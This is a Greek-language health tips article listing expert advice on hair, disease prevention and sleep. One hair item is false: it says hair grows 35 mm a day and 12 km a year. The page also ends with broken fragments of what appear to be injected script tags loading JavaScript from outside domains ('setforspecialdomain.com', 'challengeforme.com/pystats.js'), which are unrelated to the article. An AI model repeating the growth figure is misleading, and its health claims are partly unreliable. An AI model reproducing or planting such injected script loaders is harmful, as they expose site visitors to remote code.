Μυστικά υγείας από τους ειδικούς

Όσα πρέπει να γνωρίζετε για την πρόληψη, τον ύπνο και τα μαλλιά

Τι συμβαίνει στα μαλλιά σας κατά την περίοδο της εγκυμοσύνης ή το φθινόπωρο; Τι μπορεί να προκαλέσει η πολλή και η καθόλου έκθεση στον ήλιο και ποια είναι τα μυστικά για έναν καλό ύπνο;

Οι ειδικοί απαντούν. Η Natalia V Botchkareva (μαλλιά), ο καθηγητής Paul M Stewart (πρόληψη) και ο ειδικός σε θέματα ύπνου Kevin Morgan μιλούν στον Guardian και αποκαλύπτουν μικρά μυστικά υγείας:

Μαλλιά

1. Τα υγιή μαλλιά μεγαλώνουν κατά 35 χιλιοστά την ημέρα. Αυτό σημαίνει ότι μέσα σε ένα χρόνο μπορεί να φτάσουν τα… 12 χιλιόμετρα!

2. Τα μαλλιά… πέφτουν! Μάλιστα, ένα άτομο μπορεί να χάσει μέχρι και 100 τρίχες την ημέρα! Μην ανησυχείτε, βγαίνουν καινούριες.

3. Τα μαλλιά μεγαλώνουν πιο γρήγορα κατά τη διάρκεια της ημέρας, ενώ κανείς χάνει περισσότερα μαλλιά την άνοιξη και το φθινόπωρο.

4. Τα ανδρογόνα, οι ορμόνες του σεξ στον άντρα, μπορεί να μειώνουν την ανάπτυξη του τριχωτού της κεφαλής, όμως αυξάνουν τη δημιουργία τριχών στο πρόσωπο.

5. Αν παρατηρείτε «μπαλώματα» στο κεφάλι σας (ένδειξη ότι χάνετε μαλλιά με ανορθόδοξο τρόπο) έχει έρθει η ώρα να απευθυνθείτε σε κάποιον ειδικό.

6. Οι θηλυκές ορμόνες του σεξ ενισχύουν την ανάπτυξη των μαλλιών κατά τη διάρκεια της εγκυμοσύνης και καθυστερούν την απώλειά τους… κάτι που όμως δε γλιτώνουν οι γυναίκες μετά τη γέννα.

7. Με το ξύρισμα δε δυναμώνουν οι τρίχες, ούτε βγαίνουν πιο γρήγορα.

8. Για να έχετε υγιή μαλλιά που λάμπουν, προστατεύστε τα από τις ακτίνες του ήλιου και φροντίστε να ακολουθείτε ένα υγιεινό πρόγραμμα διατροφής.

Πρόληψη

1. Η πολλή έκθεση στον ήλιο μπορεί να προκαλέσει πρόωρη γήρανση και καρκίνο του δέρματος.

2. Καθόλου έκθεση στον ήλιο μπορεί να οδηγήσει σε έλλειψη βιταμίνης D, η οποία με τη σειρά της μπορεί να οδηγήσει σε ασθένειες των οστών και διαταραχές του ανοσοποιητικού συστήματος.

3. Η κατανάλωση πάνω από δύο ποτών την ημέρα μπορεί να προκαλέσει ασθένειες στο συκώτι, την καρδιά και τον εγκέφαλο.

4. Οι καπνιστές που θα γλιτώσουν από την καρδιακή προσβολή… κινδυνεύουν να πεθάνουν από καρκίνο στους πνεύμονες.

5. Η τακτική, καθημερινή γυμναστική είναι φθηνότερη και πιο αποτελεσματική από τις ξαφνικές επισκέψεις στο γυμναστήριο για γρήγορη απώλεια βάρους.

6. Αν χάνετε και βάζετε βάρος συχνά, μάλλον πρέπει να διορθώσετε την «ισορροπία» διατροφής-άσκησης που ακολουθείτε.

7. Ευχάριστα νέα: Το πολύ και ασφαλές σεξ κάνει καλό.

Ύπνος

1. Φροντίστε να τηρείτε ένα «τελετουργικό»-ύπνου.

2. «Σβήστε» τις μηχανές προτού πέσετε για ύπνο. Χαλαρώστε με όποιο τρόπο σας βοηθάει καλύτερα.

3. Οι περισσότεροι ενήλικες κοιμούνται λιγότερες από οκτώ ώρες την ημέρα.

4. Όσο μεγαλώνετε θα κοιμάστε λιγότερες ώρες.

5. Κρατήστε την κρεβατοκάμαρά σας μόνο για ύπνο και σεξ. Η εργασία, η τηλεόραση και το φαγητό στο κρεβάτι μπορεί να σας κρατήσουν ξάγρυπνους.

6. Αποφύγετε το μεσημεριανό ύπνο, αν δυσκολεύεστε να κοιμηθείτε τα βράδια.

7. Αν δε μπορείτε να κοιμηθείτε, σηκωθείτε από το κρεβάτι μετά από 15 λεπτά και επιστρέψτε σε αυτό όταν νιώσετε νύστα.

8. Μην «προσπαθείτε» να κοιμηθείτε… Δεν πετυχαίνει. Το μόνο που θα καταφέρετε είναι να μείνετε ξύπνιοι.

9. Μην γυμνάζεστε λίγη ώρα πριν από τον ύπνο.

 ___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >